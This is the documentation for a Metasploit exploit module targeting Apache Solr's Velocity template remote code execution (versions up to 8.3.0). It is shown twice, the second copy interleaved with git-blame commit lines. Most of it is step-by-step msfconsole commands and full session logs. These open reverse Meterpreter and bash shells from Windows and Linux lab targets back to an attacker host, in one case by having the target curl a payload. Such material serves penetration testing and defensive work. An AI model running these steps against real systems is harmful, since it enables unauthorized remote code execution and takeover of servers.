documentation/modules/exploit/multi/http/solr_velocity_rce.md

## Description
This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
Velocity template. Currently, this module only supports Solr basic authentication.

**From the Tenable advisory**

Link: https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

An attacker could target a vulnerable Apache Solr instance by first
identifying a list of Solr core names. Once the core names have been
identified, an attacker can send a specially crafted HTTP POST request
to the Config API to toggle the params resource loader value for the
Velocity Response Writer in the solrconfig.xml file to true. Enabling
this parameter would allow an attacker to use the Velocity template
parameter in a specially crafted Solr request, leading to RCE.

## Vulnerable Applications

Apache Solr <= 8.3.0

## Verification Steps

1. Start `msfconsole`
2. `use exploit/multi/http/solr_velocity_rce`
3. `set RHOST <target_ip>`
4. `set RPORT <target_port>`
5. `set USERNAME <username>` (if applicable)
6. `set PASSWORD <password>` (if applicable)
7. Ideally run `check`
8. `set TARGET` based on output of `check`
9. `set PAYLOAD <payload_name>` if you want to use other payloads
10. `set LHOST <your_ip>`
11. `set LPORT <your_port>`
12. Optional: `set VERBOSE true` to get verbose output
13. Optional: `set TARGETURI <path_to_solr>` if target system uses a different path to Apache Solr
14. `exploit` and let the shells rain

## Considerations

Privileges gained are dependent on the user running Solr. Currently,
this module only supports basic auth.

The "Java (in-memory)" target should work on any vulnerable system
regardless of OS. It requires that the victim system be able to make
HTTP requests to the attack platform.

Windows systems have 3 targets:
1. x86/64 Windows PowerShell: Uses `PowerShell` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
2. x86/64 Windows CmdStager: Uses `CmdStager` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
3. Windows Exec: Executes a command and returns the output. Payload defaults to `cmd/windows/generic`

*nix systems have 2 targets:
1. Unix (in memory): Uses command execution. Payload defaults to `cmd/unix/reverse_bash`. Output may be returned depending on payload used.
2. Linux (dropper): Uses `CmdStager`. Payload defaults to `linux/x86/meterpreter/reverse_tcp`

## Examples

### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using PowerShell
```
msf5 > use exploit/multi/http/solr_velocity_rce
msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
RHOSTS => 192.168.137.132
msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2
TARGET => 2
msf5 exploit(multi/http/solr_velocity_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Windows Server 2019 amd64 10.0
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[*] Sending stage (180291 bytes) to 192.168.137.155
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.155:50210) at 2020-03-29 00:04:01 +0800

meterpreter > sysinfo
Computer        : 2K19DTCTR
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
gSystem Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
```

### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using CmdStager
```
msf5 > use exploit/multi/http/solr_velocity_rce
msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
RHOSTS => 192.168.137.132
msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 3
TARGET => 3
msf5 exploit(multi/http/solr_velocity_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Windows Server 2019 amd64 10.0
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[*] Sending CmdStager payload...
[*] Command Stager progress -   7.05% done (7160/101541 bytes)
[*] Command Stager progress -  14.10% done (14320/101541 bytes)
[*] Command Stager progress -  21.15% done (21480/101541 bytes)
[*] Command Stager progress -  28.21% done (28640/101541 bytes)
[*] Command Stager progress -  35.26% done (35800/101541 bytes)
[*] Command Stager progress -  42.31% done (42960/101541 bytes)
[*] Command Stager progress -  49.36% done (50120/101541 bytes)
[*] Command Stager progress -  56.41% done (57280/101541 bytes)
[*] Command Stager progress -  63.46% done (64440/101541 bytes)
[*] Command Stager progress -  70.51% done (71600/101541 bytes)
[*] Command Stager progress -  77.56% done (78760/101541 bytes)
[*] Command Stager progress -  84.62% done (85920/101541 bytes)
[*] Command Stager progress -  91.67% done (93080/101541 bytes)
[*] Command Stager progress -  98.67% done (100188/101541 bytes)
[*] Sending stage (180291 bytes) to 192.168.137.155
[*] Command Stager progress - 100.00% done (101541/101541 bytes)
[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.155:50211) at 2020-03-29 00:06:01 +0800

meterpreter > sysinfo
Computer        : 2K19DTCTR
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
```

### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, with payload `cmd/windows/generic`
```
msf5 > use exploit/multi/http/solr_velocity_rce
msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
RHOSTS => 192.168.137.132
msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 4
TARGET => 4
msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami
CMD => whoami
msf5 exploit(multi/http/solr_velocity_rce) > exploit

[*] Found Apache Solr 8.3.0
[*] OS version is Windows Server 2019 amd64 10.0
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[+] 2k19dtctr\administrator
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/solr_velocity_rce) >
```

### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/reverse_bash`
```
msf5 > use exploit/multi/http/solr_velocity_rce
msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
RHOSTS => 192.168.137.129
msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
RPORT => 80
msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0
TARGET => 0
msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
USERNAME => user
msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
PASSWORD => j6lzH82e6Jc5
msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/solr_velocity_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[*] Command shell session 17 opened (192.168.137.128:4444 -> 192.168.137.129:48600) at 2020-03-29 00:20:50 +0800

id
uid=999(solr) gid=1002(solr) groups=1002(solr)
```

### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/generic`
```
msf5 > use exploit/multi/http/solr_velocity_rce
msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
RHOSTS => 192.168.137.129
msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
RPORT => 80
msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0
TARGET => 0
msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
USERNAME => user
msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
PASSWORD => j6lzH82e6Jc5
msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami
CMD => whoami
msf5 exploit(multi/http/solr_velocity_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[+] solr
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/solr_velocity_rce) >
```

### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager, with payload `linux/x86/meterpreter/reverse_tcp`
```
msf5 > use exploit/multi/http/solr_velocity_rce
msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
RHOSTS => 192.168.137.129
msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
RPORT => 80
msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
USERNAME => user
msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
PASSWORD => j6lzH82e6Jc5
msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
TARGET => 1
msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
LHOST => 192.168.137.128
msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/solr_velocity_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[*] Using URL: http://0.0.0.0:8080/PDeRPN1t
[*] Local IP: http://192.168.137.128:8080/PDeRPN1t
[*] Client 192.168.137.129 (curl/7.52.1) requested /PDeRPN1t
[*] Sending payload to 192.168.137.129 (curl/7.52.1)
[*] Sending stage (985320 bytes) to 192.168.137.129
[*] Meterpreter session 18 opened (192.168.137.128:4444 -> 192.168.137.129:48604) at 2020-03-29 00:23:13 +0800
[*] Command Stager progress - 100.00% done (149/149 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.137.129
OS           : Debian 9.11 (Linux 4.9.0-11-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`## Description`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`Velocity template. Currently, this module only supports Solr basic authentication.`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`From the Tenable advisory`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`Link: https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability`

			`An attacker could target a vulnerable Apache Solr instance by first`
			`identifying a list of Solr core names. Once the core names have been`
			`identified, an attacker can send a specially crafted HTTP POST request`
			`to the Config API to toggle the params resource loader value for the`
			`Velocity Response Writer in the solrconfig.xml file to true. Enabling`
			`this parameter would allow an attacker to use the Velocity template`
			`parameter in a specially crafted Solr request, leading to RCE.`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
			`## Vulnerable Applications`

Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`Apache Solr <= 8.3.0`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
			`## Verification Steps`

			1. Start `msfconsole`
			2. `use exploit/multi/http/solr_velocity_rce`
			3. `set RHOST <target_ip>`
			4. `set RPORT <target_port>`
			5. `set USERNAME <username>` (if applicable)
			6. `set PASSWORD <password>` (if applicable)
			7. Ideally run `check`
			8. `set TARGET` based on output of `check`
			9. `set PAYLOAD <payload_name>` if you want to use other payloads
			10. `set LHOST <your_ip>`
			11. `set LPORT <your_port>`
Using `heredoc`, streamlined check for PowerShell, improved docs. 2019-12-29 12:00:50 +08:00			12. Optional: `set VERBOSE true` to get verbose output
			13. Optional: `set TARGETURI <path_to_solr>` if target system uses a different path to Apache Solr
			14. `exploit` and let the shells rain
REALLY added documentation. 2019-12-26 23:35:34 +08:00
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`## Considerations`

Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`Privileges gained are dependent on the user running Solr. Currently,`
			`this module only supports basic auth.`

Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`The "Java (in-memory)" target should work on any vulnerable system`
			`regardless of OS. It requires that the victim system be able to make`
			`HTTP requests to the attack platform.`

Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`Windows systems have 3 targets:`
			1. x86/64 Windows PowerShell: Uses `PowerShell` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
			2. x86/64 Windows CmdStager: Uses `CmdStager` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
			3. Windows Exec: Executes a command and returns the output. Payload defaults to `cmd/windows/generic`

Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`*nix systems have 2 targets:`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			1. Unix (in memory): Uses command execution. Payload defaults to `cmd/unix/reverse_bash`. Output may be returned depending on payload used.
			2. Linux (dropper): Uses `CmdStager`. Payload defaults to `linux/x86/meterpreter/reverse_tcp`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`## Examples`

Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using PowerShell`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			```
			`msf5 > use exploit/multi/http/solr_velocity_rce`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`RHOSTS => 192.168.137.132`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128`
			`LHOST => 192.168.137.128`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444`
			`LPORT => 4444`
			`msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2`
			`TARGET => 2`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > exploit`

Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`[*] Started reverse TCP handler on 192.168.137.128:4444`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`[*] Found Apache Solr 8.3.0`
			`[*] OS version is Windows Server 2019 amd64 10.0`
Using `heredoc`, streamlined check for PowerShell, improved docs. 2019-12-29 12:00:50 +08:00			`[*] Found core(s): techproducts`
			`[*] Targeting core 'techproducts'`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Sending stage (180291 bytes) to 192.168.137.155`
			`[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.155:50210) at 2020-03-29 00:04:01 +0800`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
			`meterpreter > sysinfo`
			`Computer : 2K19DTCTR`
			`OS : Windows 2016+ (10.0 Build 17763).`
			`Architecture : x64`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`gSystem Language : en_US`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`Domain : WORKGROUP`
			`Logged On Users : 1`
			`Meterpreter : x86/windows`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`meterpreter >`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			```

Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using CmdStager`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			```
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`msf5 > use exploit/multi/http/solr_velocity_rce`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`RHOSTS => 192.168.137.132`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128`
			`LHOST => 192.168.137.128`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444`
			`LPORT => 4444`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 3`
			`TARGET => 3`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > exploit`

Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`[*] Started reverse TCP handler on 192.168.137.128:4444`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`[*] Found Apache Solr 8.3.0`
			`[*] OS version is Windows Server 2019 amd64 10.0`
			`[*] Found core(s): techproducts`
			`[*] Targeting core 'techproducts'`
			`[*] Sending CmdStager payload...`
			`[*] Command Stager progress - 7.05% done (7160/101541 bytes)`
			`[*] Command Stager progress - 14.10% done (14320/101541 bytes)`
			`[*] Command Stager progress - 21.15% done (21480/101541 bytes)`
			`[*] Command Stager progress - 28.21% done (28640/101541 bytes)`
			`[*] Command Stager progress - 35.26% done (35800/101541 bytes)`
			`[*] Command Stager progress - 42.31% done (42960/101541 bytes)`
			`[*] Command Stager progress - 49.36% done (50120/101541 bytes)`
			`[*] Command Stager progress - 56.41% done (57280/101541 bytes)`
			`[*] Command Stager progress - 63.46% done (64440/101541 bytes)`
			`[*] Command Stager progress - 70.51% done (71600/101541 bytes)`
			`[*] Command Stager progress - 77.56% done (78760/101541 bytes)`
			`[*] Command Stager progress - 84.62% done (85920/101541 bytes)`
			`[*] Command Stager progress - 91.67% done (93080/101541 bytes)`
			`[*] Command Stager progress - 98.67% done (100188/101541 bytes)`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Sending stage (180291 bytes) to 192.168.137.155`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`[*] Command Stager progress - 100.00% done (101541/101541 bytes)`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.155:50211) at 2020-03-29 00:06:01 +0800`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00
			`meterpreter > sysinfo`
			`Computer : 2K19DTCTR`
			`OS : Windows 2016+ (10.0 Build 17763).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 1`
			`Meterpreter : x86/windows`
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`meterpreter >`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			```
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, with payload `cmd/windows/generic`
			```
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`msf5 > use exploit/multi/http/solr_velocity_rce`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155`
			`RHOSTS => 192.168.137.132`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128`
			`LHOST => 192.168.137.128`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444`
			`LPORT => 4444`
			`msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 4`
			`TARGET => 4`
			`msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami`
			`CMD => whoami`
			`msf5 exploit(multi/http/solr_velocity_rce) > exploit`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Found Apache Solr 8.3.0`
			`[*] OS version is Windows Server 2019 amd64 10.0`
			`[*] Found core(s): techproducts`
			`[*] Targeting core 'techproducts'`
			`[+] 2k19dtctr\administrator`
			`[*] Exploit completed, but no session was created.`
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`msf5 exploit(multi/http/solr_velocity_rce) >`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			```

Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/reverse_bash`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			```
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`msf5 > use exploit/multi/http/solr_velocity_rce`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129`
			`RHOSTS => 192.168.137.129`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80`
			`RPORT => 80`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0`
			`TARGET => 0`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user`
			`USERNAME => user`
			`msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5`
			`PASSWORD => j6lzH82e6Jc5`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128`
			`LHOST => 192.168.137.128`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444`
			`LPORT => 4444`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > exploit`

Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`[*] Started reverse TCP handler on 192.168.137.128:4444`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`[*] Found Apache Solr 8.3.0`
			`[*] OS version is Linux amd64 4.9.0-11-amd64`
Using `heredoc`, streamlined check for PowerShell, improved docs. 2019-12-29 12:00:50 +08:00			`[*] Found core(s): techproducts`
			`[*] Targeting core 'techproducts'`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Command shell session 17 opened (192.168.137.128:4444 -> 192.168.137.129:48600) at 2020-03-29 00:20:50 +0800`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
Using `heredoc`, streamlined check for PowerShell, improved docs. 2019-12-29 12:00:50 +08:00			`id`
			`uid=999(solr) gid=1002(solr) groups=1002(solr)`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			```

			### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/generic`
			```
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`msf5 > use exploit/multi/http/solr_velocity_rce`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129`
			`RHOSTS => 192.168.137.129`
			`msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80`
			`RPORT => 80`
			`msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0`
			`TARGET => 0`
			`msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user`
			`USERNAME => user`
			`msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5`
			`PASSWORD => j6lzH82e6Jc5`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128`
			`LHOST => 192.168.137.128`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444`
			`LPORT => 4444`
			`msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami`
			`CMD => whoami`
			`msf5 exploit(multi/http/solr_velocity_rce) > exploit`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`[*] Started reverse TCP handler on 192.168.137.128:4444`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Found Apache Solr 8.3.0`
			`[*] OS version is Linux amd64 4.9.0-11-amd64`
			`[*] Found core(s): techproducts`
			`[*] Targeting core 'techproducts'`
			`[+] solr`
			`[*] Exploit completed, but no session was created.`
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`msf5 exploit(multi/http/solr_velocity_rce) >`
Using `heredoc`, streamlined check for PowerShell, improved docs. 2019-12-29 12:00:50 +08:00			```
REALLY added documentation. 2019-12-26 23:35:34 +08:00
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager, with payload `linux/x86/meterpreter/reverse_tcp`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			```
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`msf5 > use exploit/multi/http/solr_velocity_rce`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129`
			`RHOSTS => 192.168.137.129`
			`msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80`
			`RPORT => 80`
			`msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user`
			`USERNAME => user`
			`msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5`
			`PASSWORD => j6lzH82e6Jc5`
			`msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1`
			`TARGET => 1`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128`
			`LHOST => 192.168.137.128`
			`msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444`
			`LPORT => 4444`
REALLY added documentation. 2019-12-26 23:35:34 +08:00			`msf5 exploit(multi/http/solr_velocity_rce) > exploit`

Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`[*] Started reverse TCP handler on 192.168.137.128:4444`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`[*] Found Apache Solr 8.3.0`
			`[*] OS version is Linux amd64 4.9.0-11-amd64`
			`[*] Found core(s): techproducts`
			`[*] Targeting core 'techproducts'`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Using URL: http://0.0.0.0:8080/PDeRPN1t`
			`[*] Local IP: http://192.168.137.128:8080/PDeRPN1t`
			`[*] Client 192.168.137.129 (curl/7.52.1) requested /PDeRPN1t`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`[*] Sending payload to 192.168.137.129 (curl/7.52.1)`
			`[*] Sending stage (985320 bytes) to 192.168.137.129`
Added new targets and made documentation consistent 2020-03-29 00:33:24 +08:00			`[*] Meterpreter session 18 opened (192.168.137.128:4444 -> 192.168.137.129:48604) at 2020-03-29 00:23:13 +0800`
			`[*] Command Stager progress - 100.00% done (149/149 bytes)`
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`[*] Server stopped.`
REALLY added documentation. 2019-12-26 23:35:34 +08:00
Major refactor, and more complete testing with cmd/unix payloads 2020-02-07 19:34:18 +08:00			`meterpreter > sysinfo`
			`Computer : 192.168.137.129`
			`OS : Debian 9.11 (Linux 4.9.0-11-amd64)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
Changes to support older Solr (tested 5.3.0) 2020-12-13 19:05:47 -06:00			`meterpreter >`
			```